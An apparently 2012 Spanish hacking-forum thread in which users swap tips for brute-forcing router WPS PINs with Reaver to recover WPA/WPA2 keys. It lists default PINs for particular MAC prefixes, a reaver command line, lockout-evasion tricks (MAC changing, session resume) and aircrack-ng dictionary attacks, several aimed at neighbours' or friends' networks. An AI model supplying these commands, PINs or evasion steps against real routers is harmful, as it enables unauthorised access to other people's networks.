Una de dos, o el router está preparado para no soltar la clave, o reaver no suelta una clave tan robusta, cosa qué  no se bien , ya qué en todos los foros qué he leído las claves sacadas han tenido un máximo de 14 caracteres....
Si hay algún entendido qué confirme qué reaver puede sacar cualquier clave con tantos caracteres ( así descartamos ) qué comente .
Gracias ....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 12 Agosto 2012, 20:05 pm
hola tengo un tp-link y se bloquea mucho por que se bloquea temporalmente algunos router

falta de memoria/procesador, la marca es una bosta.. lo hacen lo mas genérico posible..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 12 Agosto 2012, 20:06 pm
Las wlan_xxxx  con MAC 8c:0c:a3  tiene 20 caracteres alfanuméricos ( números y letras ).
Una de dos, o el router está preparado para no soltar la clave, o reaver no suelta una clave tan robusta, cosa qué  no se bien , ya qué en todos los foros qué he leído las claves sacadas han tenido un máximo de 14 caracteres....
Si hay algún entendido qué confirme qué reaver puede sacar cualquier clave con tantos caracteres ( así descartamos ) qué comente .
Gracias ....

yo lo probe con 46 caracteres con WPA2/AES y al toke la mostró..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 12 Agosto 2012, 21:12 pm
Eso es mentira no saca ninguna clave wpa2 para que lo sepáis todos lo de aquí las que pueden sacar son wpa con esta mac 00:19:15 con el pin este 12345670 yo he probado un montón de redes de todo tipo con varios pines  con otra diferentes y no saca ninguna después he probado una orange-xxxx wpa2 ccmp psk con este pin este pin sera valido en España me imagino no se si en los demás países valen  para que lo intentéis todo el mundo haber si lo sacáis pin :64637129,22310298 a mi con el primer pin se me ha puesto en un momento en 91%95 por ciento y después se bloqueo como siempre y otra cosa para  P4nd3m0n1um escúchame yo probé el programa supuesta mente tuyo o lo que lo creasteis y lo probé en casa de un amigo mio yo con mi portátil justamente al lado del router y se bloqueo el router y no sacaba apenas tanto por ciento llegaba solo al 15% se supone que el programa del wpscragui saca la clave por defecto del router verdad bueno este tenia el wps activado pues no saco la clave por defecto por que la clave la tenia cambiada mi amigo yo no lo sabia el no me dijo nada yo pensaba que tenia la clave por defecto pero lo que me extraña de todo esto por que ? EN la siguiente mac 00:19:15 saca la clave normal vamos la que no tiene el router por defecto eso por que ?' no lo puede hacer en las demas mac como estas 00:19:70 nunca saca la clave ni por defecto ni nada .gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 12 Agosto 2012, 23:02 pm
En mis casos, todas las redes qué he auditado, me ha sacado las claves actuales qué tenía cada cliente, bien algunas eran las qué venían por defecto qué no se cambiaron y otras las qué puso este propias (pepelu.. ricoperez,juandelosbosques )....
Qué se bloquee el router es cosa de la seguridad qué posee este, y por eso la importancia de guardar sesión y continuar cuando se desbloquee.
Hay routers muyyyy hijo***** pues hoy en día hasta los niños de 5 años saben ya de reaver y los fabricantes se han puesto las pilas con actualizaciones de estos .....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 12 Agosto 2012, 23:33 pm
Intentare con el Reaver Pro a ver QUE PASA,os contare mas tarde como va :D

Salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 12 Agosto 2012, 23:45 pm
Mil veces lo he dicho y vuelvo a repetirlo, WPSCrackGUI es simplemente un entorno gráfico para Reaver-WPS orientado con algunas mejoras como para poder mejorar en cierta forma el crackeo de WPS. WPSCrackGUI no es un Keygen, no es un Generador, no es un decrypter, ni tampoco un leaks o como lo llamen.

También como he explicado anteriormente un Router es simplemente un ordenador con el cual se rutean rutas a cada usuario que se conecte a este mismo. Por ende este tiene una CPU y una Memoria interna:

(http://i.minus.com/ihtW5yXavTWSM.PNG)

En el momento en el que realizamos un ataque por WPS estamos exigiendo al CPU y a la Memoria del Router, por ende, al realizar peticiones de conexión en un lapso de tiempo muy pequeño, el CPU y la Memoria interna del router comienzan a elevarse para poder contestar la mayor cantidad de respuestas en el lapso previsto, si esto no puede ser realizado el Router se queda sin memoria y el CPU aumenta al 100% dejando al router bloqueado espontáneamente.

En este caso la unica solucion es esperar a que el router desida realizar una limpieza dentro se si mismo, puede pasar en 1 minuto, como en 5 minutos, 10 minutos o 2 a 3 dias. No hay forma de evitar ni solucionar este problema.

Otro problema es en los routers con filmwares mas sofisticados el conteo de intenciones de acceso. ¿Como evitamos un ataque de diccionario? simplemente si al colocar la clave por 5/10/20 ves erróneamente bloquearemos al usuario según su MAC Address. En ese caso por lo general al cambiar la MAC Address se puede continuar con el ataque.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 13 Agosto 2012, 00:18 am
P4nd3m0n1um : Todo lo que has puesto estoy de acuerdo contigo de que tarda en bloquearse 2 o 3 dias pero yo ya lo he intentado muchas veces después desbloquearse esos 2 o 3 dias o minutos lo intente otra vez y otra vez se bloqueaba si yo le cambiao la clave personal que pone mi amigo la pone por defecto la saca la clave tiene algo que ver eso supuestames solo saca la clave por defecto verdad contesta esto otra cosa lo del reaver pro eso que es ?? nuevo contesta por favor eso sirve para windows 7 o hay que botearlo decirme y donde me lo puedo descargar para probar ese programa.gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 13 Agosto 2012, 00:27 am
No interesa si la clave es por defecto o no, si la da el fabricante o la pone pepito, con el PIN sabes cualquier clave.

Y si se sigue bloqueando mala suerte.  :silbar:

Reaver-WPS es simplemente una versión básica de Reaver, de descarga gratuita. Reaver-PRO es una version avanzada en version de sistema operativo creado por tacnetsol creadores de Reaver-WPS/PRO. (http://www.tacnetsol.com/products/)

Windows 7 es una M13RD4.

Más información: http://foro.elhacker.net/wireless_en_linux/reaver_pro_reaverwps_pro_edition_live_dvd-t368097.0.html (http://foro.elhacker.net/wireless_en_linux/reaver_pro_reaverwps_pro_edition_live_dvd-t368097.0.html)



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 13 Agosto 2012, 02:57 am
aam vale con el metiendo el PIN correcto se supone que sale cualquier clave verdad pues lo que te digo tendre yo muy mala suerte por que la mac esta 00:19:70 el pin es el que tiene arriba el que yo he puesto y se puso al 91% y nada se bloqueo despues el rute y se supone que la gente han sacado con ese pin la clave bueno sera mala suerte haber si sacan alguna forma de sacar este tipo de router , ya se que windows 7 es una ***** bueno tampoco es tan malo digo yo bueno pero es lo que tengo amigo que le hago yo si lo compre asín entoces el reaver pro que tengo que botearlo para que funcione ? en mi windows gracias por responderme.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 13 Agosto 2012, 03:19 am
Si al colocar el PIN 12345670 te dio 91% eso quiere decir que no es el PIN, por mas que unos digan que es por defecto, quien dice que el tipo no lo cambio o auto-genero otro?... el 1234 esta bien, pero los demás no.

Reaver PRO es booteable/LiveDVD, etc. únicamente funciona con RTL8187L/B.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 13 Agosto 2012, 15:57 pm
Me refiero a este PIN 64637129 ,22310298 el otro PIN que tu dices que supuestamente es el 12345670 ese no vale por que yo lo he comprobado en otro programa donde da los pin verdaderos y me dice que el pin 64637129 es para esta mac 00:19:70 por lo menos aqui en España , yo probe esa mac con este pin que te digo 64637129 y se me puso al 91% y despues se me bloqueo se supone que con ese pin ya sacaba la clave verdad si dicen que ese para mi es nuevo se pin a no ser que lo haya cambiado claro. El  reaver pro lo puedo boteear desde el unebotin verdad entoces no funciona con mi ATheros AR9280 contesta por favor o lo puedo intentar si puedes poner el enlace de descarga te lo agradecería lo estuve mirando la informacion que me pusiste pero no me sale nada para descargarlo es gratuito verdad como dice hay pero yo veo el enlace de descarga ni nada gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 13 Agosto 2012, 17:04 pm
El Reaver Pro no funcciona con mi laptop,ademas tengo una antena RTL8187 y nada que no hay manera.
Se bootea pero a la hora de hacer algo solamente se muestra una pantalla con una pagina web y no se que mas pero no hace nada mas,me espero unos 30 segundos mas o menos y luego aparece un mensaje diciendome de que no ha sido posible iniciar el live session,una lastima.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 13 Agosto 2012, 18:21 pm
Cyberking me puedes decir en donde me puedo descargar El Reaver Pro me puedes poner un enlace aqui para descargarmelo por fa haber si me va a mi.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 13 Agosto 2012, 18:33 pm
Cyberking me puedes decir en donde me puedo descargar El Reaver Pro me puedes poner un enlace aqui para descargarmelo por fa haber si me va a mi.

http://foro.elhacker.net/wireless_en_linux/reaver_pro_reaverwps_pro_edition_live_dvd-t368097.0.html

:P

ahora a lo mio,señores ya no se que hacer con el wifiway 3.4,definitivamente no puede mostrarme la clave WPA/WPA2 aunque tenga el pin,he probado con el Backtrack 5 R2 y tampoco va bien,no se a lo mejor mi tarjeta USB no es compatible o algo,tengo una ALFA AWUS036NH,algun consejo?

gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 13 Agosto 2012, 22:14 pm
IYo un consejo que te doy tira el wifiway3.4 a la basura yaa esa live se ha quedado ya antigua por lo que me dijo a mi el Usuarionuevo que es el creador de todas esas lives, que hay el consejo que te doy que te descargues el wifislax 4.2 el mas nuevo que hay ahora incluse el reaver mas mejorado se supone vamos y el wpscragui el 1.1.8 yo ya lo he probado y va muy bien aora no te aseguro que saque ninguna wpa2 por que eso precisamente es lo que yo estoy intentando y no saco ninguna, oye tu Alfa es compatible con cualquier programa de hackeo vamos si es compatibel con windows 7 o windows xp vale para cuaquier ordenador portatil o sea de mesa ?? pregunto contesta cuando puedas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 13 Agosto 2012, 23:11 pm
EL ALFA es compatible con Windows 7,Vista y XP,vale para cualquier ordenador no importa si es de mesa o portatil.

Ya tengo el Wifislax 4.1,el 4.2 no se de donde sacaste esta informacion,en cualquier caso he intentado ponerle modulos manualmente y lo unico que no me funciona es el WPSCrackgui,he probado con varios y nada,necesito que alguine me ayude con ese tema.

Gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 13 Agosto 2012, 23:19 pm
Gracia por resolverme esa ayuda de la ALFA habER como te ha ayudo a lo tuyo esa información la he sacado yo de buena mano en seguridad wireles que son lo que saben del tema del wifislax y toda las lives haber es raro que el wpscragui no te funcione en el wifiway3.4 a mi si me funciona haber lo tienes que meter en la carpeta de modulo una vez lo arrancas normal el programa lo tienes que poner en modo monitor y despues haber el wpscragui y lo tienes que poner en mon0 y ya esta tio no complique mas haber si no te quieres complicar mas y tener una version mejor como te he dicho antes deja el wifiway3.4 y descargaste el nuevo wifislax mas mejorado mira aqui te dejo un enlace :
http://www.wifislax.com/

NO es broma hay lo tienes y tiene instalado el
-incluido wpscrackgui 1.1.8 COMPLETO mas facil imposible amigo hace lo mismo que el otro wpscragui en version mas nueva.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 14 Agosto 2012, 10:06 am
Buenas P4nd3m0n1um, despues de horas intentando hacer saltar wps no he podido, me ha quedado claro que las broadcom no son compatibles con reaver.

Pero hay algo que pueda hacer con este chipset para sacar WPA que tenga WPS?



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 14 Agosto 2012, 13:38 pm
Bueno,tengo instalado el WifiSlax4.2 y no se porque se cuelga despues de iniciar el ataque con wpscrackgui 1.1.8,me paso 2 veces ya y no se que hacer ya,volver a wifiway que es mucho mas estable y no me da problemas como me los esta dando el wifislax 4.2.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 14 Agosto 2012, 14:42 pm
si se te colgó dos veces que raro a mi creo que también pero solo fue una o dos veces creeo, pero a mi ahora me va bien no se me cuelga ni nada tío no se de todas manera tiene el wifislax4.2 x64 , prueba con ese haber si no se te cuelga tio de todas manera investigare en alguna pagina si le da mas fallo a mas gente para ver si el USUARIONUEVO lo soluciona eso creo que le ha pasado a mas gente por lo que he leiido en otros foros averiguaree vale.saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 14 Agosto 2012, 14:47 pm
habeis sacado alguna tp link esque tengo un y se bloquea al llegar al 0 7 % la mac es f8:d1:11 si algien sabe el pin que lo diga saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 14 Agosto 2012, 16:19 pm
habeis sacado alguna tp link esque tengo un y se bloquea al llegar al 0 7 % la mac es f8:d1:11 si algien sabe el pin que lo diga saludos

a ver como te va:

MAC-F8:D1:11xxxxxx
PT-LINK
PIN-4867xxxx

suerte.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 14 Agosto 2012, 22:39 pm
Hola sabeis si las vodafone con esta mac tiene pin por defecto 64:16:f0 esque estoy viendo ya muchas vodafone de este tipo de mac que le estan activando el wps que antes no lo tenian bueno saludos espero alguna respuesta


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 14 Agosto 2012, 23:30 pm
GOolden Yo lo he comprobado en un programita que tengo donde me dices si tiene pin esa mac o no ?? y demomento no la tiene tu has sacado alguna WPA2 ? con el reaver te pregunto por ejemplo de estas mac 00:19:70 dime has sacado alguna por que yo no he sacado ninguna wpa2 .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 15 Agosto 2012, 00:02 am
Hola sabeis si las vodafone con esta mac tiene pin por defecto 64:16:f0 esque estoy viendo ya muchas vodafone de este tipo de mac que le estan activando el wps que antes no lo tenian bueno saludos espero alguna respuesta

olvidate de vodafone de momento,son bastante complicadas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 15 Agosto 2012, 00:48 am
elsevi no en mi pueblo no hay esas redes de orange pero son bastantes dificiles se bloquean muchos por que estas intentando sacar alguna a una cosa cyberking por que dices que las vodafone con esa mac son complicadas de sacar con reaver saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 15 Agosto 2012, 17:47 pm
elsevi no en mi pueblo no hay esas redes de orange pero son bastantes dificiles se bloquean muchos por que estas intentando sacar alguna a una cosa cyberking por que dices que las vodafone con esa mac son complicadas de sacar con reaver saludos

Porque nadie todavia ha podido sacar algun pin de vodafone que yo sepa.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 15 Agosto 2012, 20:07 pm
claro eso es con esta mac 00:19:70 es de Orange-xxxx puse el pin y se me pone al 91 porciento mass o menos ustedes habeis sacado alguna clave con esta mac ??


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 16 Agosto 2012, 12:01 pm
elsevi po has avanzado muchisimo con esa si dices que por el 91% no todo el mundo avanza tanto con ese tipo de redes bueno avisa si te da la clave que estara a punto saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 16 Agosto 2012, 12:28 pm
GOolden si tu crees pues yo ya llevo mucho tiempo intentando estos router y con la mac 00:19:70 con el  pin que puse anteriormente en este foro  y no tengo forma de sacarla probé con varios pines y se bloquea no hay forma lo dejo que pase algunos días para que se desbloque solo el router y lo intento otra vez y no hay forma lo probé con este  pin 64637129 es el unico pin que mas se ha acercado tu de donde eres es que depende a lo mejor del país donde este valdrá un pin o u otro verdad bueno de momento no lo saco lo siguire intentado haber  que pasa.Por curiosidad de que Pais eres tu ?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 16 Agosto 2012, 13:31 pm
yo de españa pero dejalo que valla solo desde el principio a ver que pasa si se bloquea espera hasta que se desbloquee lo que pasa que asin te llevara mas tiempo las contraseñas de estas redes son muy largas son livebox 2 estos router tienen un mecanismo de desfensa o algo que se bloquean mucho bueno saludos con lo que sea responde


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 16 Agosto 2012, 14:32 pm
aam que bien de españa pues si eso pasa que tienen un mecanismo de defensa para bloquearse y no hay forma tu has sacado alguna orange de estas con esa mac dime es que yo ya lo dejado mucho tiempo encenido el ordenador y se bloqueaba el router y me da miedo dejarlo tanto tiempo vaya se que me queme el ordenador para luego no sacar la  clave yo creo que demomento es complicadop sacarlo  si tu tienes algun o otro pin para esas mac pasamelo por pribado porfa.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Cyberking en 16 Agosto 2012, 15:50 pm
aam que bien de españa pues si eso pasa que tienen un mecanismo de defensa para bloquearse y no hay forma tu has sacado alguna orange de estas con esa mac dime es que yo ya lo dejado mucho tiempo encenido el ordenador y se bloqueaba el router y me da miedo dejarlo tanto tiempo vaya se que me queme el ordenador para luego no sacar la  clave yo creo que demomento es complicadop sacarlo  si tu tienes algun o otro pin para esas mac pasamelo por pribado porfa.

cuando se bloquea esperate unos 2 min y luego pon Ctrl + c (salvas la session) a continuacion inicia el ataque otravez con reaver,si te pregunta:

quiere usted restaurar la sesion anterior? (la pregunta es en ingles por cierto) y tu le dices que si escribiendo "y" (sin comillas) y pulsas enter.

salu2.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 82naros en 16 Agosto 2012, 17:41 pm
hola sou 82 naros y nuevo en el foro.
expongo mi problema,tengo un ruter libebox2 sagem de orange-xxxx con mac:C0:AC:54:xx:xx:xx ,y wps activado por defecto,me lo instalaron hace 3 meses.
Me gustan los temas de auditoria wairless y he estado intentando sacar la clave con el reaver que viene en el wifiway 3.4 y se bloquea el wps,primero se bloquea un rato despues de mas intentos un dia y al intentarlo unas 5 veces permanentemente.
AGUIEN SABE ALGUN TRUCO PARA BURLAR EL BLOQUEO DEL WPS DE ORANGE-XXXX.
Muchas gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 16 Agosto 2012, 18:03 pm
QUE yo sepa no hay ninguna forma de burlar ese tipo de bloqueo por lo que he leido en los foros ademas yo lo he intentando miles de veces con el libebox2 sagem de orange-xxxx también de un amigo y como habras leido en este foro me pasaba lo mismo que a ti primero por que te tienes que saverbien el pin adecuado para que te saque la clave y aunque te lo sepas tampoco te lo saca por que tiene un mecanismo de defensa para estos ataques me imagino yo de momento no conozco a nadie que haya sacado un router de orange-xxxx ademas si te saves el pin de tu router no creo que tengas problemas en sacar la clave dime con que pin lo pruebas ? haber si a mi me sirve también yo tengo otro pin y se me puso 91 por ciento  y despues se me bloqueo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 17 Agosto 2012, 11:02 am
elsevi y todavia sigue bloqueado tu router cuantos dias lleva ya el router no yo no he sacado ninguna orange todavia bueno saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 17 Agosto 2012, 16:57 pm
el router es de un amigo mio tarda en desbloquear unos 2 o 3 dias pero vamos que yo ya lo intentado muchas veces con el reaver y no lo  saca nunca tio y eso que le dado el pin y todo lo que voy a intentar hace una cosa hacer un diccionario y pasarselo por el aircrackn-ng pero ante tengo que capturar el hanske probare alguna diccionario que me descargue haber que pasa si no pues tendre que hacer uno mio si alguien tiene un diccionario bueno para las orange-xxxx con esta mac 00:19:70 que me lo pase por favor estoy haciendo pruebas.un saludo GOolden escúchame intenta tu con este pin este que te voy adar por favor 64637129 y dime por favor si sacas la clave o no y a cuanto se te pone vale pruebalo con tu orange o con alguna orange y me dices para hacer una prueba porfa y me cuentas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Seaworth en 17 Agosto 2012, 17:52 pm
Porque nadie todavia ha podido sacar algun pin de vodafone que yo sepa.

Sí que se ha podido, aunque no sé si hay un patrón general.

Si buscas un poco por Intenet, verás que hay gente que dice que con reaver se puede obtener el PIN WPS de las Vodafone con MAC 62:c0:6f, 6a:c7:14, f4:c7:14, 6a:a8:e4, 72:a8:e4, 72:c0:6f. Lo que no sé es si hay un patrón general, o cada router tiene su propio PIN, diferente de los demás.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 18 Agosto 2012, 07:42 am
El unico patrón son los cuatro primeros dígitos del pin, los otros cuatro restantes pertenecen únicamente a cada router.
Elsevi, si no te dio la clave con ese pin es porque no es el qué corresponde a ese router.
Esas redes tienen claves de 14 dígitos y son todo números,  y eso por defecto, a no ser qué se haya cambiado clave personal.
Suerte y un saludo .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 18 Agosto 2012, 17:51 pm
sapito123 Pues muy raro por que ese pin si le ha dado la clave a otra gente el que yo te puesto aqui , otra cosa la clave que yo intento sacar de Orange-xxxx no es de 14 digitos dado que es una WPA2 son de 26 digitos por defecto de la clave claro si no lo ha cambiado y haya puesto una clave personal pero se supone que si sabes el pin bien aunque cambie la clave personal te la clave verdad ?? o no te pregunto tu has sacado alguna clave WPA2 de orange-xxxx hazme un favor prueba tu el pin tienes alguna orange el pin que yo he puesto aqui haber que resultado sacas tu hazme ese favor si puedes.un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 18 Agosto 2012, 18:26 pm
Una cosa que se me ha ocurrido haber que opináis vosotros no se si sera una jilipolle mía o una tontería estado pensando si cojee y capturar el hanske de la Orange-xxxx con esta mac 00:19:70 y cojer hacer un diccionario con todo los posibles pines y tiraserlo por el aircrack-ng haber si dentro del archivo de capturar aparte de que tenga la clave encuentra también el posible pin  extacto podría hacer eso o es una tontería y perdida de tiempo decirme es que ya no se que hacer.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 19 Agosto 2012, 00:58 am
pero esque nadie ha sacado esta orenge ni la vodafone esta con esta mac 64:16:f0 con reaver yo estoy intentando sacar la vodafone con esta mac va cambiando de pin poco apoco pero me sale esto Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message y asin siempre cambia de pin y todo alfuna veces se queda pillado y lo tengo que reiniciar saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 19 Agosto 2012, 04:02 am
GOolden YO he probado capturando el hanske y tirando le un diccionario de 1.7 GB ME lo tire por el aircrack-ng del wifilax me ha tardado 8 horas y no me ha sacado la clave vamos que no la encontrado en el diccionario ni nada vaya perdida de tiempo escúchame GOolden si tienes algua orange metele el pin que te dije por fa haber que resultado te da a ti solo por curiosidad haber si tu lo sacas con el pin que le meti.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 19 Agosto 2012, 19:52 pm
pero esque nadie ha sacado esta orenge ni la vodafone esta con esta mac 64:16:f0 con reaver yo estoy intentando sacar la vodafone con esta mac va cambiando de pin poco apoco pero me sale esto Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message y asin siempre cambia de pin y todo alfuna veces se queda pillado y lo tengo que reiniciar saludos

Ahí tienes mala comunicación con el router. Principalmente envías un M2 pero el router contesta cualquier cosa y envías un M2D (M2Decrypter), pero el router no contesta, pasa el tiempo mínimo y se ve un Last Message, se pierde o el router no contesta y se vuelve a enviar en mensaje; y ahí se queda boludiando...

Unica forma que este mal el driver, no tenga soporte, no funcione bien el adaptador o este viejo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 19 Agosto 2012, 19:58 pm
no si el router esta pared con pared y voy por el 32% pero tengo duda de si llegara al 99% y no me da la clave  pero esque cambia de pin y todo con ese error que pensais saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 19 Agosto 2012, 20:16 pm
no si el router esta pared con pared y voy por el 32% pero tengo duda de si llegara al 99% y no me da la clave  pero esque cambia de pin y todo con ese error que pensais saludos

Que se va a morir en 99% porque no tiene forma de saber el pin.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 19 Agosto 2012, 21:08 pm
y porque al final no va adivinar el pin si va cambiando de porcentaje saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 19 Agosto 2012, 22:15 pm
.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 19 Agosto 2012, 22:46 pm
adrihamel el pin ese lo puse Yo aquí para que lo probarais pero me parece increíble que tu lo hayas intentado y te haya dado al clave a mi se me kedo en 91% escuchame de que pais eres tu por que este pin de momento vale aqui en ESpaña en otro sitio no lo se por favor dame tus datos en privado de la contraseña para yo hacer un diccionario te ha dado la clave por defecto o o la clave cambiada dame los datos por pribado te lo agradeceria me alegro un moton que te haya servido ese pin a mi dememento nada de nada dime como lo has echo lo pasos que has echo  ;-) ;-) ;-) una cosa puede ser que yo lo haya echo mal la forma con que le hice el ataque a esa mac 00:19:70 yo lo hago asin reaver -i mon0 -b la mac -vv --pin64637129 no entiendo por que poneis -c x eso que kiere decir dime por fa lo voy a intentar como tu haces pero explicamelo como hace los paso bien.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 19 Agosto 2012, 22:57 pm
el pin no es el que has puesto tu, ese le probe y me salía como a ti al 91 por ciento se bloqueaba y este le busque busque por internet y le probe y en 29 segundos me dio la clave. El pin empieza por 6496 (no pongo el resto por seguridad) si quieres el pin déjame un privado que yo no se como se pone (perdona mi poco conocimiento) Soy de España. Dejame un privado poniendo cualquier cosa y yo te respondo con todo lo que quieras saber. La clave supongo que será la de por defecto porque si sale el pin no creo que sea cambiada nose alomejor me equivoco. El router es de 30 megas con cifrado wpa2 Parece ser que los de orange se tienen que poner un poco mas las pilas porque mucha seguridad no tienen. salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 19 Agosto 2012, 23:02 pm
y porque al final no va adivinar el pin si va cambiando de porcentaje saludos

Si no se recibe un M1, y se envía un M2, y se recibe un M3, y se envía un M4 y se recibe un M5 y se envía un M6 y se recibe un M7, no hay forma de saber el pin. Pues cada contestación del router indica a una parte del pin, si no tienes el M7 no sabes el ultimo numero del Pin, por ende el Pin va a ser erróneo, si no tienes un M5, no tienes los ante últimos 3 números del Pin, por ende el Pin va a ser erróneo. El porcentaje es simplemente donde estas parado en un diccionario de 11003 lineas. Suele pasar que si reaver ve que el Pin no da en cierta cantidad de intento, lo saltea.. por eso se encuentran los errores de 99% y sin parar, el Pin pero no la WPA, etc.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 19 Agosto 2012, 23:04 pm
parece incriible que esos router se hallan caido ya ehnorabuena yo ahora mismo estoy intentando con una vodafone con esta mac 64:16:f0 lo habeis sacado alguno de vosotros son duras saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 19 Agosto 2012, 23:05 pm
P4nd3m0n1um te importaria decirme el comando que tu pones en reaver para sacar la clave wpa2 haber si yo intentandolo de otra forma soy capaz de sacar la clave el comando exacto que tu pones por que yo lo  hago de otra forma y nunca lo saco por favor.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 19 Agosto 2012, 23:05 pm
no entiendo por que poneis -c x eso que kiere decir dime por fa lo voy a intentar como tu haces pero explicamelo como hace los paso bien.

-c es el canal; igual no hay que especificar mucho porque sino se queda tonto el reaver..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 19 Agosto 2012, 23:06 pm
